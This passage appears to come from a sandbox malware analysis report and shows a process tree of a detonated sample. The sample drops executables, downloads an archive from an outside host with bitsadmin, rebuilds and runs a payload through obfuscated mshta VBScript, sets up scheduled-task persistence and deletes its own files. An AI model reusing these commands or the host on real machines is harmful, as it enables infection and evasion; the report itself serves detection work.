                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaEFBE.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:7808
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaEFBE.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                  • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                                  PID:8560
                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                      PID:4652
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                    "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                                                                                                                                    PID:8012
                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\REklqNzNECvet2XS0boKVsaJ.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\REklqNzNECvet2XS0boKVsaJ.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        PID:5092
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                          PID:5664
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:8000
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\FE3D.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\FE3D.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        PID:5336
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FE3D.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\FE3D.exe
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                          PID:2904
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1427.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1427.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                        PID:6604
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\29D3.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\29D3.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                        PID:2576
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\33F6.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\33F6.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5940
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\49D1.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\49D1.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                          PID:7068
                                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:6564
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 244
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                              PID:7012
                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                            PID:6580
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                              PID:2496
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5EC1.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\5EC1.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                            PID:4496
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5EC1.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5EC1.exe
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:2208
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\B37A.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\B37A.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                              PID:6876
                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                              PID:5832
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:5372
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\24E3.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\24E3.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:1932
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2474.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2474.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                PID:4396
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2474.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\2474.exe
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                  PID:2244
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                    icacls "C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                    PID:5956
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2474.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\2474.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                    PID:6512
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2474.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\2474.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Modifies extensions of user files
                                                                                                                                                                                                                                                                      PID:7252
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\6bbde91a-32f4-4b5a-8b81-472618ab1009\build2.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\6bbde91a-32f4-4b5a-8b81-472618ab1009\build2.exe"
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                        PID:8084
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\6bbde91a-32f4-4b5a-8b81-472618ab1009\build2.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\6bbde91a-32f4-4b5a-8b81-472618ab1009\build2.exe"
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                          PID:7812
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\6bbde91a-32f4-4b5a-8b81-472618ab1009\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:4652
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                PID:8472
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                PID:4792
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\6bbde91a-32f4-4b5a-8b81-472618ab1009\build3.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\6bbde91a-32f4-4b5a-8b81-472618ab1009\build3.exe"
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                          PID:7448
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\6bbde91a-32f4-4b5a-8b81-472618ab1009\build3.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\6bbde91a-32f4-4b5a-8b81-472618ab1009\build3.exe"
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:4372
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                PID:4688
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\56F0.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\56F0.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:1096
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5F4E.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5F4E.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                      PID:1840
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 5F4E.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5F4E.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:7560
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                            taskkill /im 5F4E.exe /f
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                            PID:8160
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                            PID:5192
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\6942.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\6942.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:7020
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBSCRipt: clOSe ( creaTEObJecT ("WsCRiPT.sheLL" ). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\6942.exe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\6942.exe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:4292
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\6942.exe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "" == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\6942.exe" ) do taskkill -IM "%~NxN" /f
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:6824
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe
                                                                                                                                                                                                                                                                                    wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:6372
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VBSCRipt: clOSe ( creaTEObJecT ("WsCRiPT.sheLL" ). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF ""/p4nbpeM1nqd~Rrsm~Y "" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:7540
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "/p4nbpeM1nqd~Rrsm~Y " == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" ) do taskkill -IM "%~NxN" /f
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                              PID:7672
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vBScRiPt: cLose (cReateOBjECt ( "wscript.ShElL" ). RUN ("CmD /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = ""MZ"" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D & sTARt msiexec /y .\NXXHJC.d & deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:6048
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = "MZ" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D & sTARt msiexec /y .\NXXHJC.d & deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r
                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                  PID:7540
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                      PID:7624
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>OuVq.r"
                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                        PID:4576
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                        msiexec /y .\NXXHJC.d
                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                          PID:3612
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                    taskkill -IM "6942.exe" /f
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                    PID:7420
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6DC7.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\6DC7.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:5104
                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                PID:7804
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                PID:8048
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                PID:7952
                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 7F0B85F4CA5BADD88C0E56EED35A6DEF C
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:3784
                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 3940BB148BA1B72E9F5D21028E0E70BB
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:4816
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                        PID:7344
                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding C34FF69D6FDA397944B2A46E634EE9D1 E Global\MSI0000
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:4108
                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                      PID:7224
                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:7796
                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                        PID:8080
                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:7584
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                          PID:3764
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:7940
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                            PID:8744
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:8660
                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:4436
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:4888
                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                  PID:5944
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                  PID:4612
                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                  PID:836
                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
